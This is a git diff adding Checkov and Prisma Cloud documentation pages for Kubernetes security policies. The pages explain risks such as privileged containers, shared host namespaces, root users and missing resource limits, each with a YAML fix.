passwords or keys, passed as environment variables. +We recommend you do not admit containers wishing to share the host process ID namespace. 
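+ +For context, a pod manifest that this policy would flag requests the host's PID namespace. The manifest below is an illustrative sketch; the pod name and image are assumptions: + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: example-pod +spec: +- hostPID: true # shares the host process ID namespace; flagged by this check + containers: + - name: app + image: nginx +----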
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* hostPID (Optional) When set to false, Pods are unable to use their host's PID namespace. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ hostPID: false +---- + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* must grant access to *use* the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole** is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-10.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-10.adoc new file mode 100644 index 000000000..4ff214e9f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-10.adoc @@ -0,0 +1,62 @@ +== CPU limits are not set +// CPU limits not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e6f3690e-f808-4aea-811a-2a581128355b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/CPULimits.py[CKV_K8S_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks 
+|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +Kubernetes allows administrators to set CPU quotas in namespaces, as hard limits for resource usage. +Containers cannot use more CPU than the configured limit. +Provided the system has CPU time free, a container is guaranteed to be allocated as much CPU as it requests. +CPU quotas are used to ensure adequate utilization of shared resources. +A system without managed quotas could eventually collapse due to inadequate resources for the tasks it bears. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:limits:cpu (Optional) + +Defines the CPU limit for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + limits: ++ cpu: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-11.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-11.adoc new file mode 100644 index 000000000..22683b385 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-11.adoc @@ -0,0 +1,64 @@ +== Memory requests are not set +// Memory requests not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8b8441fc-c393-47ed-b47f-ff06bfcd3e0f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py[CKV_K8S_12] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Memory resources can be defined using values from bytes to petabytes; it is common to use mebibytes. +If you configure a memory request that is larger than the amount of memory on your nodes, the pod will never be scheduled.
+When specifying a memory request for a container, include the *resources:requests* field in the container's resource manifest. +To specify a memory limit, include *resources:limits*. +The request guides scheduling, while the limit bounds the container's actual usage. +A container is guaranteed to have as much memory as it requests, but is not allowed to use more memory than the limit set. +This configuration may save resources and limit the impact of a compromised container. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:requests:memory (Optional) + +Defines the memory request size for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + requests: ++ memory: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-12.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-12.adoc new file mode 100644 index 000000000..c2bee88f3 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-12.adoc @@ -0,0 +1,61 @@ +== Memory limits are not set +// Memory limits not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 267d86e3-7066-4e25-822d-57680e66dcb7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py[CKV_K8S_13] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The scheduler uses resource request information for containers in a pod to decide which node to place the pod on. +The kubelet enforces the resource limits set, so that the running container is not allowed to use more resources than the limit set.
+If a process in the container tries to consume more than the allowed amount of memory, the system kernel terminates the process that attempted the allocation, with an out-of-memory (OOM) error. +With no limit set, the container can consume more and more of the node's memory until none is left. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:limits:memory (Optional) + +Defines the memory limit for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + limits: ++ memory: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-13.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-13.adoc new file mode 100644 index 000000000..907da1cd8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-13.adoc @@ -0,0 +1,60 @@ +== Image tag is not set to Fixed +// Image tag not set to 'Fixed' + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9e743d41-478b-460d-b1e2-eb54bb92fe17 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py[CKV_K8S_14] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +You can add a fixed tag to a container image, making it easier to determine what it contains, for example to specify the version. +Container image tags and digests are used to refer to a specific version or instance of a container image. +We recommend you avoid using the *:latest* tag or leaving the tag blank when deploying containers in production, as it is harder to track which version of the image is running, and more difficult to roll back properly.
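+ +For example, pinning the image to a specific version tag keeps deployments reproducible. The pod name, image name, and version below are illustrative assumptions: + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: example-pod +spec: + containers: + - name: app ++ image: nginx:1.25 # fixed version tag instead of :latest or no tag +----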
+ +=== Fix - Buildtime + + +*Kubernetes* + +*Resource*: Container +*Argument*: image:tag (Optional) + +Defines the image version by a specific number or by using *latest*. + + + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: ++ image: : +- image: +- image: :latest +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-14.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-14.adoc new file mode 100644 index 000000000..1da004812 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-14.adoc @@ -0,0 +1,60 @@ +== Image pull policy is not set to Always +// Image pull policy not set to 'Always' + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a2eea53c-a666-4616-b19d-d08c0261b622 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py[CKV_K8S_15] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The Image Pull Policy of a container is set using the *imagePullPolicy*. +The *imagePullPolicy* for a container and the tag of the image affect when the kubelet attempts to pull the specified image. +When the *imagePullPolicy* is set to *Always*, you ensure the latest version of the image is deployed every time the pod is started. +Avoid using the *:latest* tag when deploying containers in production; it is harder to track which version of the image is running and more difficult to roll back correctly. + +=== Fix - Buildtime + + +*Kubernetes* + +*Resource*: Container +*Argument*: imagePullPolicy (Optional) + +Defines when the kubelet should attempt to pull the specified image.
+ + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: ++ imagePullPolicy: Always +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-15.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-15.adoc new file mode 100644 index 000000000..de99c1f21 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-15.adoc @@ -0,0 +1,62 @@ +== Container is privileged + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b63bdc58-a1d5-4980-b4dd-11eafc47641e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py[CKV_K8S_16] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Privileged containers are containers that have all of the root capabilities of a host machine, allowing access to resources that are not accessible in ordinary containers. +Common uses of privileged containers include: running a Docker daemon inside a Docker container, running a container with direct hardware access, and automating CI/CD tasks in the open-source automation server Jenkins. +Running a container with a privileged flag allows users to have critical access to the host's resources. +If a privileged container is compromised, it does not necessarily entail remote code execution, but it implies that an attacker will be able to run as full host root with all of the available capabilities, including CAP_SYS_ADMIN. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* privileged (Optional) + +If true, processes in privileged containers are essentially equivalent to root on the host. +Defaults to false.
+ + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: +- privileged: true +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-16.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-16.adoc new file mode 100644 index 000000000..b179e9cf8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-16.adoc @@ -0,0 +1,55 @@ +== Containers share host process ID namespace + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6d52c14b-7684-4f26-a5bf-fa7d7e1e0a04 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py[CKV_K8S_17] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Namespaces provide isolation for running processes and limit access to system resources without the running process being aware of those limitations. +To limit an attacker's options to escalate privileges from within a container, we recommend you configure containers to refrain from sharing the host process ID namespace. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* hostPID (Optional) If true, the Pod uses the host's PID namespace. + +Defaults to false.
+ + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: +- hostPID: true +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-17.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-17.adoc new file mode 100644 index 000000000..17e548215 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-17.adoc @@ -0,0 +1,83 @@ +== Containers share host IPC namespace + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10cf6234-c41e-409f-bbcb-536327f091b9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py[CKV_K8S_18] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Pods share many resources, so it could make sense to share a process namespace. +Some container images may expect to be isolated from other containers. +Not sharing IPC namespaces helps ensure isolation. +Containers in different pods have distinct IP addresses and will need special configuration to communicate by IPC. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* hostIPC (Optional) If true, the Pod uses the host's IPC namespace. +Default to false. 
+ + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: +- hostIPC: true +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: +- hostIPC: true +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: +- hostIPC: true +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-18.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-18.adoc new file mode 100644 index 000000000..b3537e090 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-18.adoc @@ -0,0 +1,82 @@ +== Containers share the host network namespace +// Containers share host network namespace + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d75d1d2a-a62b-4a6c-bd89-5020f10caafd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py[CKV_K8S_19] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +When using the host network mode for a container, that container's network stack is not isolated from the Docker host, so the container shares the host's networking namespace and does not get its own IP-address allocation. +To limit an attacker's options to escalate privileges from within a container, we recommend you to configure containers to not share the host network namespace. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* hostNetwork (Optional) If true, the Pod uses the host's network namespace. +Default to false. 
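The three host-namespace policies above (hostPID, hostIPC, hostNetwork) share the same shape: a pod-spec boolean that defaults to false and should stay that way. That shared check can be sketched as follows (a hypothetical helper for intuition, not Checkov's actual code):

```python
# Illustrative sketch of the shared shape of the three host-namespace checks
# (hostPID, hostIPC, hostNetwork); hypothetical, not Checkov's actual code.
HOST_NAMESPACE_FLAGS = ("hostPID", "hostIPC", "hostNetwork")

def shared_host_namespaces(pod_spec: dict) -> list:
    """Return the host namespace flags this pod spec enables (all default to false)."""
    return [flag for flag in HOST_NAMESPACE_FLAGS if pod_spec.get(flag, False)]


spec = {"hostPID": True, "hostNetwork": True, "containers": [{"name": "app"}]}
print(shared_host_namespaces(spec))  # ['hostPID', 'hostNetwork']
```

A spec that omits all three flags passes all three policies, which is why each fix simply removes the offending line.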
+ + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: +- hostNetwork: true +---- + + +[source,yaml] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: +- hostNetwork: true +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: +- hostNetwork: true +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-19.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-19.adoc new file mode 100644 index 000000000..81739395a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-19.adoc @@ -0,0 +1,60 @@ +== Containers run with AllowPrivilegeEscalation +// Containers run with 'AllowPrivilegeEscalation' Pod Security Policy +//Suggest: Containers allow a process to can gain more privileges than its parent process + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3aa8f043-3853-4c9e-ae3a-8d3a70d69d4b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py[CKV_K8S_20] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The *AllowPrivilegeEscalation* Pod Security Policy controls whether or not a user is allowed to set the security context of a container to *True*. +Setting it to *False* ensures that no child process of a container can gain more privileges than its parent. +We recommend you to set *AllowPrivilegeEscalation* to *False*, to ensure *RunAsUser* commands cannot bypass their existing sets of permissions. 
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* allowPrivilegeEscalation (Optional) If false, the pod can not request to allow privilege escalation. +Default to true. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ allowPrivilegeEscalation: false +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-2.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-2.adoc new file mode 100644 index 000000000..6edb7e982 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-2.adoc @@ -0,0 +1,100 @@ +== Privileged containers are admitted +// Privileged containers allowed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 73ac1af4-0db3-4ad8-bdaa-4ce32d06b8d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py[CKV_K8S_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Privileged containers are containers that have all of the root capabilities of a host machine, allowing access to resources that are not accessible in ordinary containers. +Running a container with a privileged flag allows users to have critical access to the host's resources. +If a privileged container is compromised, it does not necessarily entail remote code execution, but it implies that an attacker will be able to run full host root with all of the available capabilities, including CAP_SYS_ADMIN. +Common uses of privileged containers include: running a Docker daemon inside a Docker container, running a container with direct hardware access, and automating CI/CD tasks in the open-source automation server Jenkins. 
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* privileged (Optional) When set to false, containers are unable to run processes that are essentially equivalent to root on the host. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: ++ privileged: false +---- + + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* must grant access to *use* the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The **ClusterRole** is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-20.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-20.adoc new file mode 100644 index 000000000..007764431 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-20.adoc @@ -0,0 +1,60 @@ +== Default namespace is used +// Default namespace used + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6e7d5188-5797-407a-a993-d98b58c59203 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py[CKV_K8S_21] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, every cluster comes out of the box with a namespace called "`default,`" alongside the kube-system and kube-public namespaces. +Some Kubernetes tooling is set up out of the box to use this namespace, and you cannot delete it. +We recommend that you do not use the default namespace in large production systems. +Using this namespace can result in accidental conflicts with other services. +Instead, we recommend you create alternate namespaces and use them to run additional required services. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* namespace (Optional) + +Defines the namespace to use. +Defaults to `default`.
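Note that a manifest lands in the default namespace both when it sets `namespace: default` explicitly and when it omits the field entirely, so a check has to treat a missing value as a failure. A hypothetical sketch of that logic (not Checkov's actual implementation):

```python
# Illustrative sketch: flag manifests that land in the "default" namespace,
# whether set explicitly or merely omitted. Not Checkov's actual implementation.

def uses_default_namespace(manifest: dict) -> bool:
    """True when metadata.namespace is missing or explicitly "default"."""
    return manifest.get("metadata", {}).get("namespace", "default") == "default"


print(uses_default_namespace({"kind": "Pod", "metadata": {"name": "web"}}))                       # True
print(uses_default_namespace({"kind": "Pod", "metadata": {"name": "web", "namespace": "shop"}}))  # False
```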
+ + +[source,yaml] +---- +apiVersion: +kind: +metadata: + name: ++ namespace: +- namespace: default +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-21.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-21.adoc new file mode 100644 index 000000000..2555757df --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-21.adoc @@ -0,0 +1,64 @@ +== Read-Only filesystem for containers is not used +// Read-Only filesystem for containers not used +// Suggest: Container root filesystem mutable + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db181537-e359-4a4e-8baa-a6d33e3df6ad + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py[CKV_K8S_22] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +A read-only root filesystem helps to enforce an immutable infrastructure strategy. +The container should write only to mounted volumes that can persist, even if the container exits. +Using an immutable root filesystem and a verified boot mechanism prevents attackers from "owning" the machine through permanent local changes. +An immutable root filesystem can also prevent malicious binaries from writing to the host system. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* readOnlyRootFilesystem (Optional) + +Defines whether a container is able to write into the root filesystem. +Defaults to false.
+ + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ readOnlyRootFilesystem: true +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-22.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-22.adoc new file mode 100644 index 000000000..70731961c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-22.adoc @@ -0,0 +1,95 @@ +== Admission of root containers not minimized + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e343eb59-b487-4001-a3c0-f74187233802 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RootContainers.py[CKV_K8S_23] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Containers rely on the traditional Unix security model granting explicit and implicit permissions to resources, through permissions granted to users and groups. +User namespaces are not enabled in Kubernetes. +The container's user ID table maps to the host's user table, and running a process as the root user inside a container runs it as root on the host. +Although possible, we do not recommend running as root inside the container. +Containers that run as root usually have far more permissions than their workload requires. +In case of compromise, an attacker can use these permissions to further an attack on the network. +Several container images use the root user to run PID 1. +An attacker will have root permissions in the container and be able to exploit mis-configurations. 
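The pass/fail rule described above can be stated compactly: a container may run as root unless `runAsNonRoot` is set, or `runAsUser` pins a non-zero UID. A hypothetical sketch of that rule (not Checkov's actual code):

```python
# Illustrative sketch: decide whether a container may run as root, following
# the rule described above (hypothetical helper, not Checkov's actual code).

def may_run_as_root(security_context: dict) -> bool:
    """True unless runAsNonRoot is set, or runAsUser pins a non-zero UID."""
    if security_context.get("runAsNonRoot"):
        return False
    uid = security_context.get("runAsUser")
    if uid is not None and uid != 0:
        return False
    return True  # runAsNonRoot defaults to false, so root remains possible


print(may_run_as_root({}))                      # True  - nothing restricts root
print(may_run_as_root({"runAsNonRoot": True}))  # False
print(may_run_as_root({"runAsUser": 10001}))    # False
```

An empty securityContext fails the policy, which is why the fix below adds `runAsNonRoot`/`runAsUser` explicitly.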
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* runAsNonRoot (Optional) If true, Requires the container to run without root privileges. +Default to false. +runAsUser (Optional) If user number is anything other than 0, requires the container to run with that user id, which is not root. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + securityContext: ++ runAsNonRoot: true ++ runAsUser: +---- + + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: + securityContext: ++ runAsNonRoot: true ++ runAsUser: +---- + +[source,text] +---- +apiVersion: <> +kind: +metadata: + name: +spec: + template: + spec: + securityContext: ++ runAsNonRoot: true ++ runAsUser: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-23.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-23.adoc new file mode 100644 index 000000000..6415d2945 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-23.adoc @@ -0,0 +1,98 @@ +== Containers with added capability are allowed +// Containers with added capability allowed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 54f07020-c973-43a4-9ac4-fce8b8f342f6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py[CKV_K8S_24] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Using the Linux capabilities feature you can grant certain privileges to a process without granting all the privileges of the root user. 
+Added capabilities entitle containers in a pod with additional privileges that can be used to change core processes and networking settings of a cluster. +We recommend you only use privileges that are required for the proper function of the cluster. +To add or remove Linux capabilities for a container, you can include the capabilities field in the *securityContext* section of the container manifest. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* allowedCapabilities (Optional) + +Provides a list of capabilities that may be added to a container beyond the default set. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: +- allowedCapabilities: +---- + + +To use a *PodSecurityPolicy* resource, the requesting user or target pod’s service account must be authorized to use the policy. The preferred method is to grant access to the service account. In the following example we use *RBAC*, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* needs to grant access to use the desired policies. 
+ + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The *ClusterRole* is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-24.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-24.adoc new file mode 100644 index 000000000..c0e5a768c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-24.adoc @@ -0,0 +1,117 @@ +== Admission of containers with added capability is not minimized +//Admission of containers with added capability is not minimized + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b6968f2a-4b01-4c02-9931-8e10ac32b8e8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py[CKV_K8S_25] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Containers run with a default set of capabilities as assigned 